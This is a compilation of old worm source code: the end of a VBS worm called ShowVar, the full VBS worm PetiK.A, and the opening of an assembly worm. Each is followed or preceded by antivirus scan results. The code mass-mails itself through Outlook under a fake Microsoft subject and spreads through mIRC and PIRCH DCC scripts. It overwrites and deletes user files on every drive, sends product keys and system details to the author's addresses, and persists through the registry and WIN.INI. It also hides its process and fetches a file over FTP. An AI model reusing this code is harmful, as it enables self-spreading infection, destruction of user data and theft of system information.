Script.WriteLine "000-UnknownsEnabled=1"
Script.WriteLine "Level2=100-Level 100"
Script.WriteLine "100-Level 100Enabled=1"
Script.WriteLine "Level3=200-Level 200"
Script.WriteLine "200-Level 200Enabled=1"
Script.WriteLine "Level4=300-Level 300"
Script.WriteLine " 300-Level 300Enabled=1"
Script.WriteLine "Level5=400-Level 400 "
Script.WriteLine "400-Level 400Enabled=1"
Script.WriteLine "Level6=500-Level 500"
Script.WriteLine "500-Level 500Enabled=1"
Script.WriteLine ""
Script.WriteLine "[000-Unknowns]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[100-Level 100]"
Script.WriteLine "User1=*!*@*"
Script.WriteLine "UserCount=1"
Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " &
SV3
Script.WriteLine "EventCount=1"
Script.WriteLine ""
Script.WriteLine "[200-Level 200]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[300-Level 300]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[400-Level 400]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[500-Level 500]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.Close
End If
ws.RegWrite "HKCU\Software\ShowVar\PIRCH", "1"
End Function

Function EMail()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
I = 1
Do While Myself.atendofstream = False
MyLine = Myself.readline
Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) &
"&chr(34)&" & Chr(34))
Loop
Myself.Close
htm = "<HTML><HEAD><META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html;
charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><META content=" & Chr(34) &
"MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><STYLE></STYLE></HEAD><BODY
bgColor=#ffffff><SCRIPT language=vbscript>"
htm = htm & vbCrLf & "On Error Resume Next"
htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" &
Chr(34) & ")"
htm = htm & vbCrLf & "If Err.Number <> 0 Then"
htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000
size='2'>Pour lire cet EMail, merci d'activer l'option ActiveX.<br>Rouvrez ce message et
accepter les ActiveX<br>Microsoft Outlook</font>" & Chr(34) & ""
htm = htm & vbCrLf & "Else"
htm = htm & vbCrLf & "Set vbs = fso.CreateTextFile(fso.GetSpecialFolder(1) & " & Chr(34)
& "\Worm.vbs" & Chr(34) & ", True)"
htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34)
htm = htm & vbCrLf & "vbs.Close"
htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")"
htm = htm & vbCrLf & "ws.run fso.GetSpecialFolder(0) & " & Chr(34) & "\wscript.exe " &
Chr(34) & " & fso.getspecialfolder(1) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "Ce message contient de nombreux
erreurs.<br>Désolé !<br>" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "End If"
htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>"
HtmlBody = htm & htm2
Set mapi = Outlook.GetNameSpace("MAPI")
For Each Addresslist In mapi.AddressLists
If Addresslist.AddressEntries.Count <> 0 Then
AddCount = Addresslist.AddressEntries.Count
Set Msg = Outlook.CreateItem(0)
Msg.Subject = "Salut l'ami. Ouvre vite, la chance peut tourner !!"
Msg.HtmlBody = HtmlBody
Msg.DeleteAfterSubmit = True
For II = 1 To AddCount
Set Addentry = Addresslist.AddressEntries(II)
If AddCount = 1 Then
Msg.BCC = Addentry.Address
Else
Msg.BCC = Msg.BCC & "; " & Addentry.Address
End If
Next
Msg.send
End If
Next
Outlook.Quit
End If
ws.regwrite "HKCU\Software\ShowVar\MAIL", "1"
End Function

Function Divers()
If Day(Now()) = 5 Then
MsgBox "Et si on faisait une partie d'echec ?",vbinformation,"WarGames"
End If
AZE = ws.RegRead ("HKCR\txtfile\DefaultIcon")
ws.RegWrite "HKCR\VBSfile\DefaultIcon\",AZE
End Function
File ShowVar.vbs received on 05.16.2009 19:40:46 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Lee
AntiVir 7.9.0.168 2009.05.15 Worm/Lee.Based.2
Antiy-AVL 2.0.3.1 2009.05.15 Worm/VBS.Lee-based
Authentium 5.1.2.4 2009.05.16 VBS/Pica.Q
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Level
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.A5CDC117
CAT-QuickHeal 10.00 2009.05.15 VBS/Pica.Q
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 WORM.Virus
eSafe 7.0.17.0 2009.05.14 VBS.Petick.
eTrust-Vet 31.6.6508 2009.05.16 VBS/VBSWG!generic
F-Prot 4.4.4.56 2009.05.16 VBS/Pica.Q
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.VBS.Lee-based
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.E@mm
GData 19 2009.05.16 Generic.ScriptWorm.A5CDC117
Ikarus T3.1.1.49.0 2009.05.16 VBS.Lee.Based
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.VBS.Lee-based
McAfee 5616 2009.05.15 MIRC/Generic
McAfee+Artemis 5616 2009.05.15 MIRC/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Lee.Based.2
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.E
NOD32 4080 2009.05.15 VBS/Pica.Q
Norman 6.01.05 2009.05.16 VBS/Lee-based.K
nProtect 2009.1.8.0 2009.05.16 VBS.Lee.A
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.16 VBS.Petik.E
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Unknown Script Virus
Sophos 4.41.0 2009.05.16 Mal/VBSMail-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.LoveLetter.Var
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.E

Additional information
File size: 6557 bytes
MD5...: b4a5df075e6d5278036e07be004b3e09
SHA1..: e757ae3f2a165cdb1861c8c8743bd0f76c28d606
' Name : VBS/Outlook/mIrc/PIRCH/PetiK.A
' Author : PetiK
' Language : VBS
' Date : 30/01/2001

' Size : 9766 bytes

' It copies itself into the WINDIR folder under the name PetiK.txt.vbs
' To hide this, it changes the icon of .VBS files to the .TXT icon
' It then infects mIRC. It looks for the default folder containing the
' MIRC.INI file. If it finds it, it creates a SCRIPT.INI file inside that folder
' It then infects PIRCH in the same way.
' For Outlook, it writes its code inside the message as VBScript
' so that the virus activates as soon as the message is read.
' It also sends various pieces of information to two addresses:
' petik@caramail.com and ppetik@hotmail.com. The information is:
' - User name and Organization
' - Computer name
' - Country
' - WINDOWS version and version number
' - Identification number
' - Registration number
' - Internet Explorer start page
' - Download folder
' - Names of the WINDOWS, SYSTEM, TEMP and PROGRAM FILES folders
' And sends all of this with the subject:
' Message pour PetiK de XXX where XXX is the user name
' The message sent to the other people is:
' " Important Message From Microsoft Corporation "
' It then infects files according to their extension.
' VBS and VBE : writes the virus code inside.
' JS and JSE : writes the code and changes the extension : file.js => file.vbs
' EXE, INI, GIF, JPG and HTM : creates a new .VBS file with the virus code
' MP3, DOC, XLS, PPT and HLP : sets the hidden attribute

'VBS/Outlook/mIrc/PIRCH/PetiK.A by PetiK


Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(WScript.ScriptFullName,1)
vbscopie = file.ReadAll

DEBUT()
Sub DEBUT()
On Error Resume Next
Set win = fso.GetspecialFolder(0)
RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
Set c = fso.GetFile(WScript.ScriptFullName)
PetiK = (win&"\PetiK.txt.vbs")
c.Copy (PetiK)
ws.RegWrite RUN,PetiK
VBSI = ws.RegRead ("HKCR\VBSFile\DefaultIcon\")
TXTI = ws.RegRead ("HKCR\txtfile\DefaultIcon\")
ws.RegWrite "HKLM\Software\PetiK\ICONE VBS",VBSI
ws.RegWrite "HKCR\VBSFile\DefaultIcon\",TXTI
If ws.RegRead ("HKLM\Software\PetiK\") <> "OK" Then
EMail()
End If
If ws.RegRead ("HKLM\Software\PetiK\MIRC") <> "OK" then
Mirc ""
End If
If ws.RegRead ("HKLM\Software\PetiK\PIRCH") <> "OK" then
Pirch ""
End If
lecteur()
End Sub

Function EMail()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
I = 1
Do While Myself.atendofstream = False
MyLine = Myself.readline
Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) & "&chr(34)&" & Chr(34))
Loop
Myself.Close
htm = "<HTML><HEAD><META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html; charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><META content=" & Chr(34) & "MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><STYLE></STYLE></HEAD><BODY bgColor=#ffffff><SCRIPT language=vbscript>"
htm = htm & vbCrLf & "On Error Resume Next"
htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
htm = htm & vbCrLf & "If Err.Number <> 0 Then"
htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000 size='2'>You need ActiveX enabled if you want to see this EMail.<br>Please open this message again and click accept ActiveX<br>Microsoft Outlook</font>" & Chr(34) & ""
htm = htm & vbCrLf & "Else"
htm = htm & vbCrLf & "Set vbs = fso.CreateTextFile(fso.GetSpecialFolder(1) & " & Chr(34) & "\Worm.vbs" & Chr(34) & ", True)"
htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34)
htm = htm & vbCrLf & "vbs.Close"
htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")"
htm = htm & vbCrLf & "ws.run fso.GetSpecialFolder(0) & " & Chr(34) & "\wscript.exe " & Chr(34) & " & fso.getspecialfolder(1) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "This message has permanent errors.<br>Sorry<br>" & Chr(34) & ""
htm2 = htm2 & vbCrLf & "End If"
htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>"
HtmlBody = htm & htm2
Set mapi = Outlook.GetNameSpace("MAPI")
For Each Addresslist In mapi.AddressLists
If Addresslist.AddressEntries.Count <> 0 Then
AddCount = Addresslist.AddressEntries.Count
Set Msg = Outlook.CreateItem(0)
Msg.Subject = "Important Message From Microsoft Corporation"
Msg.HtmlBody = HtmlBody
Msg.DeleteAfterSubmit = True
For II = 1 To AddCount
Set Addentry = Addresslist.AddressEntries(II)
If AddCount = 1 Then
Msg.BCC = Addentry.Address
Else
Msg.BCC = Msg.BCC & "; " & Addentry.Address
End If
Next
Msg.send
End If
Next
Set msg2 = Outlook.CreateItem(0)
ComputerName = CreateObject("WScript.NetWork").ComputerName
NOM = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ENT = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
VER = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
NUM = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
REC1 = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
REC2 = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
PFD = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
PDEM = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
DDIR = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\Download Directory")
PAYS = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage")
WINDIR = fso.GetSpecialFolder(0)
SYSDIR = fso.GetSpecialFolder(1)
TMPDIR = fso.GetSpecialFolder(2)
msg2.BCC = "petik@caramail.com;ppetik@hotmail.com"
msg2.Subject = "Message pour PetiK de " & NOM
m2 = "-Information :"
m2 = m2 & vbCrLf & "Date : " & date
m2 = m2 & vbCrLf & "Heure : " & time
m2 = m2 & vbCrLf & "NOM DE L'ORDINATEUR : " & ComputerName
m2 = m2 & vbCrLf & "ENTREPRISE : " & ENT
m2 = m2 & vbCrLf & "PAYS : " & PAYS
m2 = m2 & vbCrLf & "SYSTEME D'EXPLOITATION : " & VER & " " & NUM
m2 = m2 & vbCrLf & "NUMERO D'IDENTIFICATION : " & REC1
m2 = m2 & vbCrLf & "NUMERO D'ENREGISTREMENT : " & REC2
m2 = m2 & vbCrLf & "PAGE DE DEMARRAGE : " & PDEM
m2 = m2 & vbCrLf & "DOSSIER DE TELECHARGEMENT : " & DDIR
m2 = m2 & vbCrLf & "DOSSIER WINDOWS : " & WINDIR
m2 = m2 & vbCrLf & "DOSSIER SYSTEME : " & SYSDIR
m2 = m2 & vbCrLf & "DOSSIER TEMPORAIRE : " & TMPDIR
m2 = m2 & vbCrLf & "DOSSIER PROGRAM FILES : " & PFD
msg2.Body = m2
msg2.DeleteAfterSubmit = True
msg2.Send
Outlook.Quit
End If
ws.RegWrite "HKLM\Software\PetiK\","OK"
End Function

Function Mirc(Path)
'On Error Resume Next
If Path = "" Then
If fso.FileExists("c:\mirc\mirc.ini") Then Path = "c:\mirc"
If fso.FileExists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32"
PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
PK2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
If fso.FileExists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc"
If fso.FileExists(PFD & "\mirc32\mirc.ini") Then Path = PFD & "\mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "\script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & PK2
Script.writeline "n3=}"
Script.Close
ws.RegWrite "HKLM\Software\PetiK\MIRC", "OK"
End If
End Function

Function Pirch(path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.FileExists("c:\pirch\Pirch32.exe") Then path = "c:\pirch"
If fso.FileExists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32"
pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
PK3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
If fso.FileExists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
If fso.FileExists(pfDir & "\pirch32\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "\events.ini", True)
Script.WriteLine "[Levels]"
Script.WriteLine "Enabled=1"
Script.WriteLine "Count=6"
Script.WriteLine "Level1=000-Unknowns"
Script.WriteLine "000-UnknownsEnabled=1"
Script.WriteLine "Level2=100-Level 100"
Script.WriteLine "100-Level 100Enabled=1"
Script.WriteLine "Level3=200-Level 200"
Script.WriteLine "200-Level 200Enabled=1"
Script.WriteLine "Level4=300-Level 300"
Script.WriteLine " 300-Level 300Enabled=1"
Script.WriteLine "Level5=400-Level 400 "
Script.WriteLine "400-Level 400Enabled=1"
Script.WriteLine "Level6=500-Level 500"
Script.WriteLine "500-Level 500Enabled=1"
Script.WriteLine ""
Script.WriteLine "[000-Unknowns]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[100-Level 100]"
Script.WriteLine "User1=*!*@*"
Script.WriteLine "UserCount=1"
Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " & PK3
Script.WriteLine "EventCount=1"
Script.WriteLine ""
Script.WriteLine "[200-Level 200]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[300-Level 300]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[400-Level 400]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[500-Level 500]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.Close
End If
ws.RegWrite "HKLM\Software\PetiK\PIRCH", "OK"
End Function

Sub lecteur
On Error Resume Next
dim f,f1,fc
Set dr = fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub
Sub infecte(dossier)
On Error Resume Next
Set f = fso.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
ext = fso.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe")
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.Write vbscopie
ap.Close
elseif (ext="js") or (ext="jse") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.Write vbscopie
ap.Close
bn=fso.GetBaseName(f1.path)
Set cop=fso.GetFile(f1.path)
cop.Copy(dossier&"\"&bn&".vbs")
fso.DeleteFile(f1.path)
elseif (ext="exe") or (ext="ini") or (ext="gif") or (ext="jpg") or (ext="htm") Then
Set cr = fso.CreateTextFile(f1.path&".vbs")
cr.Write vbscopie
cr.Close
fso.DeleteFile(f1.path)
elseif (ext="mp3") or (ext="doc") or (ext="xls") or (ext="ppt") or (ext="hlp") Then
Set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
End If
Next
End Sub

Sub liste(dossier)
On Error Resume Next
Set f = fso.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
infecte(f1.path)
liste(f1.path)
Next
End Sub
File PetiK.vbs received on 05.16.2009 19:29:07 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Petik
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.A1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/VBS.VBS
Authentium 5.1.2.4 2009.05.16 VBS/Pica.Q
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Level
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.C6E6F4BD
CAT-QuickHeal 10.00 2009.05.15 VBS/Petik
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.VBS.Email-Worm.Lee-based
DrWeb 5.0.0.12182 2009.05.16 SCRIPT.WORM.Virus
eSafe 7.0.17.0 2009.05.14 VBS.Smile.
eTrust-Vet 31.6.6508 2009.05.16 VBS/VBSWG!generic
F-Prot 4.4.4.56 2009.05.16 VBS/Pica.Q
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.VBS.Lee-based
Fortinet 3.117.0.0 2009.05.16 VBS/LeeBased.E@mm
GData 19 2009.05.16 Generic.ScriptWorm.C6E6F4BD
Ikarus T3.1.1.49.0 2009.05.16 VBS.Lee.Based
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.VBS.Lee-based
McAfee 5616 2009.05.15 VBS/Generic
McAfee+Artemis 5616 2009.05.15 VBS/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.A1
Microsoft 1.4602 2009.05.16 Worm:VBS/LoveLetter.gen
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 VBS/Lee-based.F
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.F@mm
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.16 VBS.Petik.F
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Unknown Script Virus
Sophos 4.41.0 2009.05.16 VBS/VBSWG-2B
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.A@mm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.F
VBA32 3.12.10.5 2009.05.16 IRC-Worm.IRC.Generic
ViRobot 2009.5.15.1737 2009.05.15 VBS.Petik.F
VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.F

Additional information
File size: 9766 bytes
MD5...: c9103a19fecc9f28dda136a81899d2fe
SHA1..: e06a3a4da1ce93f9005977877c85733a057da4e0
comment $ 04/02/2001 => 07/02/2001
DESCRIPTION:
Registers itself as a "Service Process", that is, it is not visible in
the task list (CTRL+ALT+DEL).
Then copies itself into the SYSTEM folder under the name ie042601.exe : %SysDir%\ie042601.exe
And registers itself in the WIN.INI file :

[windows]
run=%SysDir%\ie042601.exe (where %SysDir% is the default name of the SYSTEM folder)
Creates the file SCRIPT.INI in C:\ then copies it into C:\MIRC and C:\MIRC32, then deletes
the original in C:\
Creates EMAIL.VBS in the %WinDir% directory as "read-only".
Creates WSOCK32.BAT and C:\WIN.DRV in %WinDir% as "hidden file".
The program then tries to obtain the IP address of the French-language Yahoo site
(www.yahoo.fr).
If it succeeds, it runs WSOCK32.BAT :
- Runs EMail.vbs = sends the program to every recipient in the address book.
- Downloads petik.bmp into C:\
Changes the wallpaper to the image "petik.bmp".

All BMP files in the WINDOWS directory get the hidden attribute.

TO COMPILE:
tasm32 /M /ML ie042601.asm
tlink32 -Tpe -x -aa ie042601.obj,,,import32 $

.386
jumps
locals
.model flat, stdcall

;KERNEL32.dll
extrn CreateFileA:PROC
extrn WritePrivateProfileStringA:PROC
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn FindClose:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetCurrentProcessId:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn RegisterServiceProcess:PROC
extrn SetCurrentDirectoryA:PROC
extrn SetFileAttributesA:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC

;ADVAPI32.dll
extrn RegSetValueExA:PROC
extrn RegOpenKeyExA:PROC
extrn RegCloseKey:PROC
;WSOCK32.dll
extrn gethostbyname:PROC
;USER32.dll
extrn SystemParametersInfoA:PROC
.data
szBAT db 260 dup (0)
szInfo db 260 dup (0)
szOrig db 260 dup (0)
szVBS db 260 dup (0)
szWinini db 260 dup (0)
DIR db 260 dup (0)
FileHandle dd ?
RegHandle dd ?
SearchHandle dd ?
octets dd ?
Copie db "\ie042601.exe",00h
batfile db "\wsock32.bat",00h
vbsfile db "\EMail.vbs",00h
bmpfile db "C:\petik.bmp",00h
drvfile db "C:\Win.drv",00h
inifile db "C:\script.ini",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
yahoo db "http://www.yahoo.fr",00h
SOUS_CLE db "Control Panel\Desktop",00h
TWP_D db "TileWallpaper",00h
TWP_S db "0",00h
WPS_D db "WallpaperStyle",00h
WPS_S db "2",00h
FICHIER db "*.bmp",00h

FILE_ATTRIBUTE_READONLY equ 00000001h
FILE_ATTRIBUTE_HIDDEN equ 00000002h
FILE_ATTRIBUTE_NORMAL equ 00000080h
CREATE_ALWAYS equ 00000002h
FILE_SHARE_READ equ 00000001h
GENERIC_WRITE equ 40000000h
KEY_SET_VALUE equ 00000002h
REG_SZ equ 00000001h
HKEY_CURRENT_USER equ 80000001h
SPI_SETDESKWALLPAPER equ 00000020

max_path equ 260

filetime struc
LowDateTime dd ?
HighDateTime dd ?
filetime ends
win32 struc
FileAttributes dd ? ; File attributes
CretionTime filetime ? ; Creation date
LastAccessTime filetime ? ; Last access
LastWriteTime filetime ? ; Last modification
FileSizeHigh dd ? ; File size
FileSizeLow dd ? ; Same as above
Reserved0 dd ? ;
Reserved1 dd ? ;
FileName dd max_path(?) ; Long file name
AlternativeFileName db 13 dup(?) ; Short file name
db 3 dup(?) ;
win32 ends
CHERCHE win32 <>

inid: db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick "
szCopie db 260 dup (0)
db "",0dh,0ah
db "n3=}",00h
INITAILLE equ $-inid

vbsd:
db 'Dim fso,ws,file',0dh,0ah
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'EMAIL()',0dh,0ah
db 'End Sub',0dh,0ah
db 'Sub EMAIL()',0dh,0ah
db 'Set OApp=CreateObject("Outlook.Application")',0dh,0ah
db 'If OApp="Outlook" Then',0dh,0ah
db 'Set Mapi = OApp.GetNameSpace("MAPI")',0dh,0ah
db 'For Each AddList In Mapi.AddressLists',0dh,0ah
db 'If AddList.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For AddListCount = 1 To AddList.AddressEntries.Count',0dh,0ah
db 'Set AddListEntry = AddList.AddressEntries(AddListCount)',0dh,0ah
db 'Set msg = OApp.CreateItem(0)',0dh,0ah
db 'msg.To = AddListEntry.Address',0dh,0ah
db 'msg.Subject = "The last patch for Internet Explorer"',0dh,0ah
db 'm = "Date : " & date',0dh,0ah
db 'm = m & vbCrLf & "A lot of virus and worms use a bug in Internet Explorer"',0dh,0ah
db 'm = m & vbCrLf & "This patch allows you to correct this problem"',0dh,0ah
db 'm = m & vbCrLf & ""',0dh,0ah
db 'msg.Body = m',0dh,0ah
db 'msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(1),"\ie042601.exe")',0dh,0ah
db 'If msg.To <> "" Then',0dh,0ah
db 'msg.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End if',0dh,0ah
db 'End Sub',0dh,0ah
VBSTAILLE equ $-vbsd

batd:
db "@echo off",0dh,0ah
db "if exist C:\WINDOWS\EMail.vbs start C:\WINDOWS\EMail.vbs",0dh,0ah
db "if exist C:\WINDOW\EMail.vbs start C:\WINDOW\EMail.vbs",0dh,0ah
db "if exist C:\WIN\EMail.vbs start C:\WIN\EMail.vbs",0dh,0ah
db "if exist C:\WIN95\EMail.vbs start C:\WIN95\EMail.vbs",0dh,0ah
db "if exist C:\WIN98\EMail.vbs start C:\WIN98\EMail.vbs",0dh,0ah
db "if exist C:\WINDOWS.000\EMail.vbs start C:\WINDOWS.000\EMail.vbs",0dh,0ah
db "if exist C:\WINDOWS.001\EMail.vbs start C:\WINDOWS.001\EMail.vbs",0dh,0ah
db "start ftp -i -v -s:C:\Win.drv",00h
BATTAILLE equ $-batd

drvd:
db "open",0dh,0ah
db "members.aol.com",0dh,0ah
db "pentasm99",0dh,0ah
db "lcd C:\",0dh,0ah
db "bin",0dh,0ah
db "get petik.bmp",0dh,0ah
db "bye",0dh,0ah
db "exit",00h
DRVTAILLE equ $-drvd
.code
DEBUT:
CACHE: call GetCurrentProcessId ; This hides the program
push 01h ; from the task list.
push eax ; (CTRL+ALT+DEL)
call RegisterServiceProcess ;

COPIE: push 00h ; Here we copy the original file
call GetModuleHandleA ;
push 260 ;
push offset szOrig ;
push eax ;
call GetModuleFileNameA ;
push 260 ;
push offset szCopie ;
call GetSystemDirectoryA ; into the SYSTEM directory
push offset Copie ; under the name "ie042601.exe"
push offset szCopie ;
call lstrcat ;
push 00h ;
push offset szCopie ;
push offset szOrig ;
call CopyFileA ;
WIN_INI:push 260 ; So that it runs at every startup,
push offset szWinini ;
call GetWindowsDirectoryA ; the file name is written into WIN.INI
push offset Winini ;
push offset szWinini ; in the [windows] section on the "run" line:
call lstrcat ;
push offset szWinini ; [windows]
push offset szCopie ; run=%SysDir%\ie042601.exe
push offset run ;
push offset windows ;
call WritePrivateProfileStringA ;

